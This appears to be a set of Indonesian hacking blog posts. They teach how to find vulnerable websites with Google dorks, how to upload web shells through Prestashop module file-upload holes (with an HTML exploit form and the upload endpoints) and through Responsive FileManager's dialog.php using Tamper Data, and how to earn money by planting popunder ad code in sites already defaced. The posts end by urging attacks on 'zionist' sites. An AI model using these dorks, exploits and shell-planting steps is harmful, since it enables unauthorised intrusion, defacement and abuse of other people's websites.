Mendapatkan Duit/Uang dari Pekerjaan Deface Website ( Defacer Berpenghasilan )

Kalian defacer ? Untuk apa kalian mendeface ? Alangkah baiknya kita menyelam sambil minum air , yaitu Mengais receh dari Defacing .
Bagaimana caranya ?

BAHAN :

- Laptop/Komputer dengan Koneksi

- Web yang akan di Deface ( Usahakan sudah masuk ke Shell / cPanel web tsb )

- Kopinya jangan lupa :v

LANGKAH :

1) Saya anggap kalian sudah masuk ke shell / cPanel website yang akan di deface .

2) Masuk ke propellerads ( Saya anggap anda telah mendaftar sebagai Publisher di PropellerAds ) 

atau yang lainnya seperti popcash dan popads , saya sarankan propellerads 

lalu daftarkan situs yang akan di deface .

3) Ambil kode verifikasi lalu tempatkan di web tersebut dibawah kode <head>

4) Kembali ke propellerads, buat unit iklan Popunder lalu get code

Free Script Deface Keren Disini

5) Pasang code tersebut di web yg akan dideface dibawah code <body> .

Selamat menikmati receh :) Saya sarankan tidak usah menebas suatu Web , lebih baik di pasang ads :)

Sekian,

Cara Deface Website dengan Responsive Prestashop 1.6 Arbitrary File Upload

Pada artikel yang satu ini , kami akan menjelaskan tentang " Cara deface website dengan Responsive Prestashop 1.6 Arbitrary File Upload " .
Disini menggunakan dua cara yaitu Manual dan Auto ( tools )

Berikut adalah langkah - langkah secara Manual :

#1 Dork :

- inurl:/modules/columnadverts/
- inurl:/modules/homepageadvertise/
- inurl:/modules/productpageadverts/
- inurl:/modules/simpleslideshow/
- inurl:/themes/warehouse/

untuk dork nya silahkan di kembangkan lagi.

#2  Jika Website yang anda pilih dari proses dorking tadi , apabila website tersebut memiliki celah / vuln maka akan muncul tampilan seperti ini :

#3 Apabila terdapat vuln , silahkan gunakan salah satu Exploit dan PoC di bawah ini :

- /modules/columnadverts/uploadimage.php
- /modules/homepageadvertise/uploadimage.php
- /modules/productpageadverts/uploadimage.php
- /modules/simpleslideshow/uploadimage.php

Exploit Disini:

<form action="TARGET/modules/module name/uploadimage.php" enctype="multipart/form-data" method="POST">
<input name="userfile" type="file" /><button>Upload</button>
</form>

#4 Jika upload berhasil , akan muncul tampilan seperti ini :

#5 Selesai ...

Untuk mengakses Shell / backdoor yang telah di upload , silahkan gunakan yang di bawah ini :

     Target/modules/modul name/slides/shell.php


Jika anda masih bingung dengan cara manual seperti ini , anda bisa menggunakan Tools di "Auto Exploit Responsive Prestashop 1.6  Arbitrary File Upload " .

[YC]

Cara Deface Website Dengan Teknik Responsive FileManager

Deface website atau mengganti tampilan atau isi dari website tersebut merupakan Hal yang sangat populer bagi para hacker , terutama yang baru belajar mengenai penetrasi web dan exploit .

Pada artikel kali ini, team DBT akan membagikan tutorial "Cara deface website dengan teknik Responsive Manager". Silahkan baca di bawah ini :


BAHAN : 

1. Dork : 

    1. inurl:/filemanager/ intext:”dialog.php”
    2. inurl:/js/filemanager/ intext:”dialog.php”
    3. inurl:/assets/filemanager/ intext:”dialog.php”


dork favorit admin = inurl:/assets/filemanager/ site:.com ( dork bisa anda kembangkan sendiri )


2. Exploit : /dialog.php

3. Tamper Data 

4. Shell / Backdoor

5. Script Deface anda

 Setelah semua bahan - bahan yang ada di atas telah lengkap , anda kemudian menuju ke tahap tutorial seperti di bawah ini.

Tutorial : 



#1. Buka Browser anda dan kemudian masuk ke google search engine .
Contoh kali ini saya menggunakan dork (inurl:/assets/filemanager/ site:.com)
Masukkan dork anda seperti gambar di bawah ini.
 

 
Silahkan anda memilih salah satu target yang telah muncul .

#2 . Setelah anda memilih salah satu target. Akan muncul tampilan baru seperti gambar di bawah ini.

exploit dari responsive filemanager

Pilih file yang bernama " dialog.php " tanpa tanda kutip . karna file tersebut merupakan exploit dari teknik responsive filemanager .

#3. Kemudian setelah anda mengklik file exploit dialog.php , kemudian akan muncul tampilan baru lagi seperti gambar di bawah ini :

Tekan tombol Upload atau yang berada di dalam lingkaran merah pada gambar di atas.

#4. Setelah itu , akan muncul tampilan baru lagi.
Tapi jangan buru - buru dulu , sebelum mengupload ikuti langkah yang ada pada gambar di bawah ini.

Apabila anda telah sampai pada tampilan yang ada diatas. silahkan Gunakan Tamper Data.

Pilih Alat >> Tamper Data >> Lalu anda klik START TAMPER seperti gambar di bawah ini .

#5. Setelah anda meng-klik Start tamper tadi , akan muncul form filemanager untuk mengupload file anda seperti yang ada pada gambar di bawah ini.

 Apabila telah muncul tampilan seperti di atas , upload file anda yang ber ekstensi .html
INGAT ! anda hanya bisa mengupload shell / backdoor yang ber ekstensi .html

Kemudian akan muncul form baru lagi seperti diatas , silahkan langsung klik tombol " tamper " seperti pada gambar .

 

Upload selesai ...

#6 Setelah sukses mengupload shell  , sekarang kita akan mengakses shell tersebut.
Caranya klik "Return to file list" seperti gambar di bawah ini.

kemudian kita cari shell / backdoor kita .
Klik kanan pada file shell yang telah kita upload tadi , kemudian pilih "Show URL"seperti gambar dibawah ini.

Nah setelah anda meng klik " Show URL " .  Maka akan muncul tampilan yang berisi link tempat dimana shell tersebut di upload, seperti gambar di bawah ini.

Salin URL tadi ke Address bar , dan akhirnya anda sudah masuk ke backdoor ...
Selamat ..

NB : Usahakan jangan menyerang situs dalam negeri sendiri , Gunakan untuk Membasmi kaum zionist .



[MBL]